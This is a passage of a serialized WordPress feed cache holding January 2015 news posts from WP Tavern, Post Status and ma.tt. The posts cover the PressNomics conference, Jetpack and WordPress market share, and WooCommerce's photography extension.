I enjoyed most.</p>\n<p><strong>Joshua Strebel interviews Dre Armeda</strong></p>\n<a href=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2015/01/35-Medium.jpg\" rel=\"prettyphoto[37944]\"><img class=\"wp-image-37976 size-full\" src=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2015/01/35-Medium.jpg?resize=1024%2C768\" alt=\"Joshua Strebel Interviews Dre Armeda\" /></a>Joshua Strebel Interviews Dre Armeda\n<p>Joshua Strebel interviewed Dre Armeda on stage with a bottle of scotch. Aremda described how he became involved with WordPress and founded <a title=\"https://sucuri.net/\" href=\"https://sucuri.net/\">Sucuri</a>, where he turned a two-person part-time hobby into a multi-million dollar, 30+ employee company. He also talked about his role as Vice President of Operations for <a title=\"http://webdevstudios.com/\" href=\"http://webdevstudios.com/\">WebDevStudios</a>.</p>\n<p><strong>Ben Chan</strong></p>\n<a href=\"http://i1.wp.com/wptavern.com/wp-content/uploads/2015/01/40-Medium.jpg\" rel=\"prettyphoto[37944]\"><img class=\"size-full wp-image-37978\" src=\"http://i1.wp.com/wptavern.com/wp-content/uploads/2015/01/40-Medium.jpg?resize=1024%2C768\" alt=\"Envato Stats via Ben Chan\" /></a>Envato Stats via Ben Chan\n<p>Ben Chan is the Director of Growth and Revenue at <a title=\"http://market.envato.com/\" href=\"http://market.envato.com/\">Envato</a>. The statistics he shared confirm that Envato is a huge player in various markets such as WordPress themes, audio files, and plugins. His slides are not available online, but I archived a few stats using Twitter. &#8220;Note that the earnings are before Envato takes their cut.&#8221;</p>\n<ul>\n<li>In the first 30 days, the <a title=\"http://themeforest.net/item/automotive-car-dealership-business-wordpress-theme/9210971\" href=\"http://themeforest.net/item/automotive-car-dealership-business-wordpress-theme/9210971\">Automotive theme</a> on ThemeForest had 300+ sales generating over $15K in sales.</li>\n<li>In less than 10 months, the WPlus theme had over 4K+ sales.</li>\n<li>In 2014, Visual Composer was the best selling plugin on CodeCanyon. The second best product is built on top of it.</li>\n<li>Easy Social Share buttons plugin by Appscreo has over 6K+ sales on CodeCanyon.</li>\n<li>Of the top 50 selling WordPress themes in 2014, 67% are new to the list versus 2013.</li>\n<li>79% of themes describe themselves as responsive, but make up 93% of overall earnings.</li>\n<li>Only 4% of themes in the ThemeForest marketplace have earned less than $1K in their lifetime.</li>\n<li>Envato supports initiatives in the WordPress community. One example is <a title=\"http://wptavern.com/buddypress-bbpress-and-glotpress-development-campaign-is-now-fully-funded\" href=\"http://wptavern.com/buddypress-bbpress-and-glotpress-development-campaign-is-now-fully-funded\">funding John James Jacoby</a> to work on GlotPress, bbPress, and BuddyPress full-time for six months.</li>\n</ul>\n<p><strong>Selena Larson</strong></p>\n<blockquote class=\"twitter-tweet\" width=\"550\"><p>Helpful tips from <a href=\"https://twitter.com/selenalarson\">@selenalarson</a> on how startups can pitch, including getting known thru good comments <a href=\"https://twitter.com/hashtag/Pressnomics?src=hash\">#Pressnomics</a> <a href=\"http://t.co/c3hufKKspb\">pic.twitter.com/c3hufKKspb</a></p>\n<p>&mdash; Danny Sullivan (@dannysullivan) <a href=\"https://twitter.com/dannysullivan/status/558664527303041025\">January 23, 2015</a></p></blockquote>\n<p></p>\n<p><a title=\"http://selenalarson.com/\" href=\"http://selenalarson.com/\">Selena Larson</a> who writes for <a title=\"http://www.dailydot.com/authors/selena-larson/\" href=\"http://www.dailydot.com/authors/selena-larson/\">the Daily Dot</a>, shared tips on how businesses can receive press by improving their pitches. I agreed with pretty much everything she said on the matter and hope those in attendance took notes. Here are a few highlights:</p>\n<ul>\n<li>Stop using jargon to pitch a product because no one talks like that.</li>\n<li>Describe your product, service, or business in two sentences or less.</li>\n<li>Balance your innovation with something that’s familiar. Don’t talk to reporters as if they’re investors because they’re not.</li>\n<li><a title=\"http://www.producthunt.com/\" href=\"http://www.producthunt.com/\">Product Hunt</a> is a good way to test the market or pitch a product without involving the press.</li>\n</ul>\n<p>As bonus material, be sure to read our guide on <a title=\"http://wptavern.com/tips-for-promoting-newly-released-wordpress-plugins\" href=\"http://wptavern.com/tips-for-promoting-newly-released-wordpress-plugins\">how to promote newly released plugins</a>.</p>\n<p><strong>Danny Sullivan</strong></p>\n<a href=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2015/01/51-Medium.jpg\" rel=\"prettyphoto[37944]\"><img class=\"size-full wp-image-37982\" src=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2015/01/51-Medium.jpg?resize=1024%2C768\" alt=\"SEO With Danny Sullivan\" /></a>SEO With Danny Sullivan\n<p>Danny Sullivan, who is a Founding Editor of <a title=\"http://searchengineland.com/author/danny-sullivan\" href=\"http://searchengineland.com/author/danny-sullivan\">Search Engine Land</a>, presented on the topic of SEO. It&#8217;s a topic I&#8217;ve stayed away from and don&#8217;t talk about much, but Sullivan&#8217;s presentation was not only entertaining, it was enlightening. He showed a brief history of the Google homepage and described why numerous claims of SEO being dead are false.</p>\n<p>The one thing I took away from his presentation is that SEO will never die, but continue to evolve. Because of Sullivan&#8217;s presentation, I&#8217;m going to open my mind to SEO instead of writing it off.</p>\n<p><strong>Chris Lema</strong></p>\n<blockquote class=\"twitter-tweet\" width=\"550\"><p>Things <a href=\"https://twitter.com/chrislema\">@chrislema</a> does daily <a href=\"https://twitter.com/hashtag/pressnomics?src=hash\">#pressnomics</a> <a href=\"https://twitter.com/hashtag/gtd?src=hash\">#gtd</a> <a href=\"http://t.co/WIBAlTCTkW\">pic.twitter.com/WIBAlTCTkW</a></p>\n<p>&mdash; Remkus de Vries (@DeFries) <a href=\"https://twitter.com/DeFries/status/558765203836268546\">January 23, 2015</a></p></blockquote>\n<p></p>\n<p>The CTO and Chief Strategist at <a href=\"http://crowdfavorite.com/\">Crowd Favorite</a>, Chris Lema, is one of my favorite speakers. He knows how to tell a story and keep the audience engaged. For this presentation, Lema shared tips and disciplines for getting things done. My favorite tip from his session is to start the day writing a list of three things you need to get done. Getting 2-3 items finished each day builds confidence and provides a historical record of things that are done.</p>\n<p>His stance on putting family first is an important strategy I need to work on. So far, listing three things to accomplish each day is working. I feel better about myself and it&#8217;s helping me figure out when I&#8217;ve had a good day.</p>\n<p>The last session featured Joshua Strebel interviewing Matt Mullenweg on stage, but I&#8217;m going to dissect that session in a separate post.</p>\n<h2>A Lot of Fun</h2>\n<p>Not only are the Strebels great hosts, they donated over $10K of proceeds from the event to the <a title=\"http://www.curesearch.org/\" href=\"http://www.curesearch.org/\">CureSearch</a> for Children&#8217;s Cancer charity. If there&#8217;s a PressNomics 4 and you&#8217;re involved in the economics of WordPress, I highly encourage you to attend.</p>\n<p>My goal was to be a fly on the wall for as many conversations as possible and I feel like I&#8217;ve accomplished that goal. I wouldn&#8217;t be surprised if several strategic partnerships are announced in the next few months with PressNomics being the birth place of the conversation.</p>\n<p>If you can&#8217;t wait for PressNomics 4, consider attending <a title=\"http://prestigeconf.com/tickets/\" href=\"http://prestigeconf.com/tickets/\">Prestige Las Vegas</a>, NV, February 27-28th. Similar to PressNomics, it&#8217;s a conference focused on the business side of WordPress.</p>\n<p>Here are a few other photos from the event.</p>\n<a href=\"http://wptavern.com/envato-stats-tips-for-getting-things-done-and-more-at-pressnomics-3#gallery-37944-1-slideshow\">Click to view slideshow.</a>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Wed, 28 Jan 2015 06:00:28 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Jeff Chandler\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:23;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"Matt: Kitchensink WP podcast\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:21:\"http://ma.tt/?p=44636\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:44:\"http://ma.tt/2015/01/kitchensink-wp-podcast/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:180:\"<p><a href=\"http://kitchensinkwp.com/podcast-e048-interview-with-matt-mullenweg/\">I hopped on a podcast with Kitchensink WP to chat about the latest in the WordPress world</a>.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Tue, 27 Jan 2015 23:35:00 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:4:\"Matt\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:24;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:76:\"WPTavern: How Important is Jetpack on WordPress’ Road to 50% Market Share?\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"http://wptavern.com/?p=37907\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:81:\"http://wptavern.com/how-important-is-jetpack-on-wordpress-road-to-50-market-share\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:10465:\"<p><a href=\"http://i1.wp.com/wptavern.com/wp-content/uploads/2014/07/jetpack-logo.gif\" rel=\"prettyphoto[37907]\"><img src=\"http://i1.wp.com/wptavern.com/wp-content/uploads/2014/07/jetpack-logo.gif?resize=700%2C276\" alt=\"jetpack-logo\" class=\"aligncenter size-full wp-image-27470\" /></a></p>\n<p>This past weekend, 250 professionals gathered in Phoenix, Arizona for <a href=\"http://pressnomics.com/\" target=\"_blank\">Pressnomics</a>, a three-day event focused on entrepreneurship in the WordPress economy. During the last day, attendees had the opportunity to watch Pagely CEO <a href=\"http://saint-rebel.com/\" target=\"_blank\">Joshua Strebel</a> interview Matt Mullenweg. Although the session wasn&#8217;t recorded, the audience tweeted out the highlights of the interview, and discussion continued on Twitter.</p>\n<p>Strebel pressed Mullenweg on Automattic&#8217;s agenda behind <a href=\"http://jetpack.me/\" target=\"_blank\">Jetpack</a>.</p>\n<blockquote class=\"twitter-tweet\" width=\"550\"><p>At <a href=\"https://twitter.com/hashtag/pressnomics?src=hash\">#pressnomics</a> <a href=\"https://twitter.com/strebel\">@strebel</a> refers to Jetpack as a Trojan Horse to <a href=\"https://twitter.com/photomatt\">@photomatt</a>, room goes silent</p>\n<p>&mdash; Yeti Support (@YetiSupport) <a href=\"https://twitter.com/YetiSupport/status/558772539032219648\">January 23, 2015</a></p></blockquote>\n<p></p>\n<p>This resulted in one of the most controversial statements to come out of the event:</p>\n<blockquote class=\"twitter-tweet\" width=\"550\"><p>“In the absence of <a href=\"https://twitter.com/jetpack\">@Jetpack</a>, I believe <a href=\"https://twitter.com/hashtag/WordPress?src=hash\">#WordPress</a> would be declining.” &#8211; <a href=\"https://twitter.com/photomatt\">@photomatt</a> <a href=\"https://twitter.com/hashtag/pressnomics?src=hash\">#pressnomics</a></p>\n<p>&mdash; Antony McGregor Dey (@antonymd) <a href=\"https://twitter.com/antonymd/status/558772451199299584\">January 23, 2015</a></p></blockquote>\n<p></p>\n<p>Mullenweg further clarified his statement on Twitter, essentially identifying Jetpack as a tool to bolster the platform against competition. Jetpack allows users to gain access to professionally-supported third party integrations without WordPress being forced to dump all of these features into the core software.</p>\n<blockquote class=\"twitter-tweet\" width=\"550\"><p><a href=\"https://twitter.com/zedejose\">@zedejose</a> <a href=\"https://twitter.com/mkalina\">@mkalina</a> <a href=\"https://twitter.com/jetpack\">@jetpack</a> <a href=\"https://twitter.com/antonymd\">@antonymd</a> Naked WordPress (without plugins) is not competitive to Wix, Weebly, Squarespace, etc.</p>\n<p>&mdash; Matt Mullenweg (@photomatt) <a href=\"https://twitter.com/photomatt/status/559559918898794496\">January 26, 2015</a></p></blockquote>\n<p></p>\n<blockquote class=\"twitter-tweet\" width=\"550\"><p><a href=\"https://twitter.com/mkalina\">@mkalina</a> <a href=\"https://twitter.com/jetpack\">@jetpack</a> <a href=\"https://twitter.com/antonymd\">@antonymd</a> <a href=\"https://twitter.com/zedejose\">@zedejose</a> You should consider the rest: There\'s secular decline of non-mobile, non-social publishing systems.</p>\n<p>&mdash; Matt Mullenweg (@photomatt) <a href=\"https://twitter.com/photomatt/status/559532172596359168\">January 26, 2015</a></p></blockquote>\n<p></p>\n<p>Jetpack-enabled blogs have more features available to them on the WordPress mobile apps, which are wholly sponsored by Automattic. Many self-hosted WordPress users don&#8217;t appreciate the fact that the mobile apps are packed full of WordPress.com features, but, at the moment, there are no superior alternatives. In our most recent <a href=\"http://wptavern.com/matt-mullenweg-on-ensuring-the-future-of-wordpress\" target=\"_blank\">interview with Mullenweg</a>, he deftly addressed the friction caused by <a href=\"http://wptavern.com/poll-who-uses-reader-in-the-wordpress-mobile-apps\" target=\"_blank\">the preeminence of WordPress.com’s Reader in the app</a>, which he sees as a gateway that simplifies the onboarding process for new users.</p>\n<blockquote><p>I see it as a gateway drug and it gives people more options down the road. If we don’t do anything on mobile, five years from now, when everyone is only using mobile devices, they will all have Squarespace’s or Weebly’s. WordPress is still around but it just doesn&#8217;t matter. This allows us to matter five years from now.</p></blockquote>\n<p>With both Jetpack and the mobile apps, Mullenweg sees an opportunity for Automattic to provide functionality that goes beyond the core publishing experience to offer mobile access and connect users with readers and commenters via social networks.</p>\n<h3>The Road to 50% Market Share</h3>\n<p>In a recent <a href=\"http://kitchensinkwp.com/podcast-e048-interview-with-matt-mullenweg/\" target=\"_blank\">interview with Adam Silver on the KitchensinkWP podcast</a>, Mullenweg gave a better overall picture of his next goal for WordPress and how he sees the platform reaching more users in the future. The software is currently used on <a href=\"http://w3techs.com/technologies/overview/content_management/all\" target=\"_blank\">23.3% of websites worldwide</a> and is on track to reaching 25% before the end of the year. Mullenweg hopes to grow that number to 50%:</p>\n<blockquote><p>The next goal is the majority of websites. We want to get to 50%+ and there&#8217;s a lot of work between now and then. As the percentage increases, it gets harder and harder to grow the market share, and we have to grow the market share by doing things we haven&#8217;t done in the past &#8211; really thinking about the onboarding process, really thinking about the integration with social networks, and with how WordPress works on touch devices, which is going to be the predominant computing platform of the future. These things are going to be really important.</p>\n<p>What got us here isn&#8217;t going to get us there. Once we get to 50%, we can decide something new we want to do.</p></blockquote>\n<p>With a focus on the onboarding process, integration with social networks, and mobile publishing, Mullenweg is outlining how he sees the mobile apps and Jetpack entering the picture to grow the market share and prevent the decline of the platform.</p>\n<p>For Mullenweg, a 50% market share with a growing international user base isn&#8217;t a purely business goal, but rather ties back in with WordPress&#8217; mission to democratize publishing with open source software. In response to Silver&#8217;s question on whether or not the recent focus on the mission is connected to an increase in non-English downloads, Mullenweg replied:</p>\n<blockquote><p>The big assumption in what we&#8217;re doing is that there&#8217;s an inherent goodness to the transparency and the ability for people to publish. Of course people use WordPress to publish things I personally disagree with or might find morally odious. But it&#8217;s very important that we provide the people the opportunity to have that voice. </p>\n<p>By giving everyone equal ability and access to reach the web, you&#8217;re a click away from several billion people. But you&#8217;re not if you don&#8217;t have the tools to really reach them. It&#8217;s not hunger or clean water or any of the big problems that society has, climate change, but at least for our little part in it, I think we can make a pretty big dent in it.</p></blockquote>\n<p>Mullenweg knew that WordPress had the potential to have an enormous impact on the world of publishing, even when the software was still batting in the minor leagues. WordPress.com was originally created to help users set up blogs while bypassing what used to be a complicated hosting and installation process. Over the years, as WordPress.com adapted more sophisticated ways of supporting the average WordPress user, the idea of Jetpack was born to connect self-hosted blogs with the same features.</p>\n<p>The question is whether or not Jetpack and the mobile apps are the missing link for helping users get connected to billions of people. While Jetpack&#8217;s features aren&#8217;t necessarily unique, they are professionally-supported and users feel safe banking on the plugin for the foreseeable future.</p>\n<p>Mullenweg&#8217;s controversial statement about WordPress being in decline without Jetpack was phrased as conjecture, because there&#8217;s no objective way to prove this unless you remove Jetpack from the picture entirely. As he further explained in his Twitter reply, the notion is based on witnessing the decline of other publishing systems that aren&#8217;t innovating with social or mobile features.</p>\n<p>Those who disagree with the statement object to the idea of hinging the success of WordPress&#8217; market share on a plugin produced by a commercial entity. This is especially provocative when it comes to mobile, as Automattic&#8217;s agenda to promote WordPress.com features goes unrivaled. Nevertheless, WordPress wouldn&#8217;t have a mobile publishing platform without the company&#8217;s subsidy of the open source apps.</p>\n<p>If WordPress is dependent on Jetpack to continue building its market share to 50%, then the software&#8217;s future is inextricably tied to Automattic&#8217;s continued success. The company is one of a small few that have the capital to invest in a major plugin like Jetpack along with the ongoing improvement of the mobile apps.</p>\n<p>&#8220;Last year, Automattic raised a bit more funding than we have in the past,&#8221; Mullenweg told Silver in his interview. &#8220;It&#8217;s actually bigger than most IPO&#8217;s. We raised $160 million and that gives us a lot of capital to invest into the community. We&#8217;re able to make bigger bets, longer term bets, and it also solidifies us as an independent entity for many years to come.&#8221;</p>\n<p>The WordPress open source project can still be considered a success in terms of its mission, even if it doesn&#8217;t achieve a dominant market share. Tying its growth to Jetpack is a bold statement that eclipses some of WordPress&#8217; best qualities, such as its rigid adherence to protecting user freedoms with the GPL, the strong community of contributors, and the massive ecosystem of products and services surrounding it. The availability of Jetpack may be one factor responsible for WordPress&#8217; growing market share, but I don&#8217;t think it&#8217;s the sole tool saving WordPress from decline.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Tue, 27 Jan 2015 22:27:38 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Sarah Gooding\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:25;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:51:\"Post Status: WooCommerce is going after photography\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:30:\"https://poststatus.com/?p=7728\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:47:\"https://poststatus.com/woocommerce-photography/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:7576:\"<p>Photography is a huge &#8212; and quite competitive &#8212; market. WooThemes has one nice advantage, in that they are quite dominant in the eCommerce space.</p>\n<p>However, catering to actually selling photos is a whole new world. You&#8217;re talking about competing with dozens of services, some quite vertically integrated (from website, to photo management, to photo fulfillment), to a very picky audience full of people with unique workflows.</p>\n<p>I am not a photographer. However, last year I did a ton of research on photography product potential in the WordPress space. I was working with <a href=\"http://ran.ge\">Range</a>, and we were exploring creating our own photography product. I interviewed a dozen professional photographers in person, ranging in industry, experience, and company size.</p>\n<p>I learned a lot during that research phase; and one thing I learned is that this is no easy venture.</p>\n<p>The new WooCommerce photography extension does one thing quite nicely: it allows a photographer to create albums where customers can bulk purchase photos, and it allows the photographer to upload the photos for purchase, as well as protect the albums so that only the photography client can view them.</p>\n<p>You can view a marketing video, walkthrough video, and screenshots for <a href=\"http://www.woothemes.com/products/woocommerce-photography/\">WooThemes&#8217; Photography extension</a> on the dedicated product page.</p>\n<h3>Considerations for true professional photo management / sales</h3>\n<p>However, that is one piece of the puzzle. This plugin makes the client-side of ordering relatively painless, but there are other elements to think about:</p>\n<ul>\n<li>Narrowing an album from a lot of photos to fewer photos</li>\n<li>Choosing to make an album visible to a wedding party or others that may want to purchase, in addition to a client</li>\n<li>Creating a more visual gallery of an album, versus a &#8220;purchase&#8221; view</li>\n<li>Enabling uploads to be synchronous with an editing tool, like Lightroom</li>\n<li>Enabling categorization, automated meta data, and various grouping mechanisms for photos</li>\n<li>The ability to quickly send the same or select photos from a client-viewed album to a new gallery for a blog post about a client event</li>\n<li>Integrating a photo fulfillment service, to actually print and deliver purchased photos</li>\n<li>And much more</li>\n</ul>\n<p>I&#8217;m sure WooThemes has done a good bit of research for this product. However, I think they&#8217;ve made a feature that&#8217;s not yet ready for your every day photographer. Of the photographers I met, most lamented the experience of creating, managing, and selling photos and albums.</p>\n<p>I think that there is a lot of room in the self-hosted photography space, and my reasoning is simple. Right now, selling photos and managing albums, client review, etc., on hosted services is super expensive. Plenty of services charge hundreds or even thousands of dollars per year, and/or charge massive per-purchase fees (like 10%+).</p>\n<p>A self-hosted, WordPress-integrated photography management solution &#8212; built for WordPress professionals &#8212; could be a million dollar idea on its own. I think WooCommerce creating this add-on is an interesting start, but I believe the concept has major legs that could grow into something huge.</p>\n<h3>Here are some other players in the market</h3>\n<p>Let&#8217;s start within the WordPress space:</p>\n<ul>\n<li><a href=\"http://www.photocrati.com/photography-wordpress-themes/\">Photocrati</a> &#8212; a theme plus eCommerce, gallery, and other features (these are the folks behind NextGen)</li>\n<li><a href=\"https://graphpaperpress.com/plugins/sell-media/\">Sell Media</a> &#8212; Graph Paper Press&#8217;s spin on selling media and prints. If I recall correctly, this is a fork of EDD customized for their photo-heavy theme collection</li>\n<li><a href=\"http://www.prophoto.com/explore-features/\">ProPhoto</a> &#8212; hideous but one of the more &#8220;full service&#8221; photography website options, minus selling</li>\n<li><a href=\"https://easydigitaldownloads.com/\">Easy Digital Downloads</a> &#8212; Out of the box, EDD could be used for selling photos</li>\n<li><a href=\"https://ithemes.com/exchange/\">Exchange</a> &#8212; Out of the box, Exchange could be used for selling photos</li>\n</ul>\n<p>No WordPress product is really providing a full solution though. Plenty of non-WordPress products are trying. Here are some that are interseting to look into:</p>\n<ul>\n<li><a href=\"http://www.smugmug.com/pro\">SmugMug</a> &#8212; A compelling, hosted option. Probably the most interesting in the market.</li>\n<li><a href=\"http://www.instaproofs.com/home/how-it-works.html\">InstaProofs</a> &#8212; A widely used method for proofing, selling, and fulfilling photo orders. (Requires 8%-15% commissions!)</li>\n<li><a href=\"https://discover.pictage.com/features\">Pictage</a> &amp; <a href=\"https://web.shootq.com/\">ShootQ</a> &#8212; The most vertically integrated options: from initial lead to photo fulfillment. These two are quite popular, but are expensive SaaS products.</li>\n<li>There are loads of these, but these are popular ones, and give you an idea of what WordPress-oriented products are up against.</li>\n</ul>\n<h3>I don&#8217;t envy professional photographers on the web</h3>\n<p>Professional photographers have a lot to juggle.</p>\n<p>They&#8217;ve got to manage leads, their website copy, their contacts and CRM, their galleries and portfolio, their client albums and workflow, their events, their raw copies of photos and backups, the ability for clients to buy from them, and more.</p>\n<p>Managing this entire setup online is possible, but right now a photographer with a WordPress website and a third party system for album reviews, sales, and leads is kind of lame.</p>\n<p><span class=\"pullquote alignright\">I think WordPress can do a better job, and reduce expenses for professional photographers, while enabling them to have a more synchronized web experience for their clients.</span> I think WooCommerce introducing a Photography extension is one piece of the puzzle, but it doesn&#8217;t solve the over-arching problem.</p>\n<p>I truly believe someone could create a theme and plugin shop that competes with these third parties. But it needs to have a lot going for it: beautiful display, an easy to use interface (I&#8217;m not sure the back-end of WordPress counts as this), help photographers not continuously repeat themselves during photo management, and generally make their life as a professional photographer easier.</p>\n<p>Hosted services are tackling this problem. Those photographers managing their websites on WordPress may have more freedom and lower costs, but right now the experience isn&#8217;t easier.</p>\n<p>WooThemes is making a good first step. I&#8217;m not sure that they are the right team to really go 100% though. I&#8217;d be interested to see another company build something integrated into this product from WooThemes (or another WordPress eCommerce product) and really solve professional photographers&#8217; workflow grievances.</p>\n<p>Like I said, I interviewed about a dozen photographers from different backgrounds. None of those interviewed felt particularly satisfied with their web workflows. There is room in this market. My question is: who will fulfill their needs?</p>\n<p>I think it can be a self-hosted product or hosted product, or both. But I think WordPress should be an excellent tool for photographers, and right now it&#8217;s not.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Tue, 27 Jan 2015 21:30:11 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:15:\"Brian Krogsgard\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:26;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:36:\"Matt: SPIEGEL Interviews Dean Baquet\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:21:\"http://ma.tt/?p=44634\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:52:\"http://ma.tt/2015/01/spiegel-interviews-dean-baquet/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:835:\"<blockquote><p>SPIEGEL: One of the reasons Snowden didn&#8217;t approach the New York Times was that the paper had refused to publish the initial research about the NSA&#8217;s bulk collection in 2004. The story was only published almost a year later. Was it a mistake to have held back on that reporting?</p></blockquote>\n<p> <a href=\"http://www.spiegel.de/international/business/spiegel-interview-with-chief-new-york-times-editor-dean-baquet-a-1014704.html\">This interview with Chief New York Times Editor Dean Baquet is remarkable</a> both for its frank, direct questions and its frank, direct answers. I got to meet with Dean <a href=\"https://matt.wordpress.com/2014/11/19/new-york-times-board-room/\">a few months ago</a> and it really struck me how excellent he and the other editorial and product folks inside of the NYT are.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Mon, 26 Jan 2015 23:33:32 